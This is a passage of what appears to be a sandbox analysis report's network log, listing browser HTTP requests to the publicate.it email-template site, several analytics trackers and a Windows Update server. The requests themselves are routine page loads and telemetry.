_ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /js/jquery-3.5.1.min.dc5e7f18c8.js?site=5e9170ba37cf8dfae03ae1a4 HTTP/1.1Host: d3e54v103j8qbb.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/template4-p-500.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/template5-p-500.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /?sid=bElvO73dOjE4ZMqj&data=eyJnYVRyYWNraW5nSWRzIjpbIlVBLTUyNTk3MDkwLTEiXSwiZ2FNZWFzdXJlbWVudElkcyI6W10sImdhQ2xpZW50SWRzIjpbIjEzODE2ODA2MDYuMTcyNTAzNDU3OSJdLCJjb250ZXh0Ijp7ImxpYnJhcnkiOnsibmFtZSI6ImxmdHJhY2tlciIsInZlcnNpb24iOiIyLjY0LjAifSwicGFnZVVybCI6Imh0dHBzOi8vcHVibGljYXRlLml0Lz91dG1fc291cmNlPXB1YmxpY2F0ZV91c2VyX2V4cG9ydGVkX2VtYWlscyZ1dG1fbWVkaXVtPXJlZmVycmFsJnV0bV9jYW1wYWlnbj1wb3dlcmVkX2J5X3B1YmxpY2F0ZSIsInBhZ2VUaXRsZSI6IlB1YmxpY2F0ZSB8IEhUTUwgRW1haWwgVGVtcGxhdGUgQnVpbGRlciIsInJlZmVycmVyIjoiIn0sImV2ZW50IjoidHJhY2tpbmctZXZlbnQiLCJjbGllbnRFdmVudElkIjoiNjhjYmY1NTkyMTJlYjkyNyIsInNjcmlwdElkIjoiYkVsdk83M2RPakU0Wk1xaiIsImNvb2tpZXNFbmFibGVkIjp0cnVlLCJjb25zZW50TGV2ZWwiOiJub25lIiwiYW5vbnltaXplSXAiOmZhbHNlLCJsZkNsaWVudElkIjoiTEYxLjEuZWQxZTM0NDk3OGE2NTFjNy4xNzI1MDM0NTc5Njk4IiwiZm9yZWlnbkNvb2tpZXMiOltdLCJwcm9wZXJ0aWVzIjp7fSwiYXV0b1RyYWNraW5nRW5hYmxlZCI6dHJ1ZSwiYXV0b1RyYWNraW5nTW9kZSI6Im9uX3NjcmlwdF9sb2FkIn0= HTTP/1.1Host: tr-rc.lfeeder.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /lftracker_v1_bElvO73dOjE4ZMqj.js HTTP/1.1Host: sc.lfeeder.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /c/hotjar-2431713.js?sv=7 HTTP/1.1Host: static.hotjar.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /modules.8da33a8f469c3b5ffcec.js HTTP/1.1Host: script.hotjar.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /s/0.7.45/clarity.js HTTP/1.1Host: www.clarity.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publicate.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=c33b4f75fae844d6b05821f811173c55.20240830.20250830
Source: global traffic HTTP traffic detected: GET /images/nhph2-p-500.jpg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/nhph1-p-500.jpg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/nhph3-p-500.jpg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/nhph4-p-500.jpg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/gmail_client.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/outlook_client.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /tag/kuemlmuzvn?ref=gtm2 HTTP/1.1Host: www.clarity.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=c33b4f75fae844d6b05821f811173c55.20240830.20250830
Source: global traffic HTTP traffic detected: GET /images/mailchimp_client.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/yahoo_client.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/macOS_client.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/hubspot_client.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/send_client.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/features_review_icon.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /js/profitwell.js?auth=c61691493c428b337ecf0f72fa2f9c82 HTTP/1.1Host: public.profitwell.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/more_clients.svg HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/adobe_review.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/Trustpilot_logo.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0
Source: global traffic HTTP traffic detected: GET /images/template1-p-500.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kMW+XwGzpduof8w&MD=2eL+Va3Y HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /images/template2-p-500.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703
Source: global traffic HTTP traffic detected: GET /s/0.7.45/clarity.js HTTP/1.1Host: www.clarity.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=c33b4f75fae844d6b05821f811173c55.20240830.20250830
Source: global traffic HTTP traffic detected: GET /images/favicon.png HTTP/1.1Host: publicate.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicateAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703; _clsk=1s3cw30%7C1725034585943%7C1%7C1%7Ct.clarity.ms%2Fcollect
Source: global traffic HTTP traffic detected: GET /images/template3-p-500.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703; _clsk=1s3cw30%7C1725034585943%7C1%7C1%7Ct.clarity.ms%2Fcollect
Source: global traffic HTTP traffic detected: GET /images/template4-p-500.png HTTP/1.1Host: publicate.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="; wooTracker=sB4hScRiWkjO; _gid=GA1.2.1661628616.1725034579; _gat=1; _lfa=LF1.1.ed1e344978a651c7.1725034579698; _ga_JL3QGDSQZ4=GS1.1.1725034582.1.0.1725034582.60.0.0; _ga=GA1.1.1381680606.1725034579; _ga_8ML5ENYGMT=GS1.1.1725034582.1.0.1725034582.60.0.0; _clck=137ejx4%7C2%7Cfor%7C0%7C1703; _clsk=1s3cw30%7C1725034585943%7C1%7C1%7Ct.clarity.ms%2Fcollect
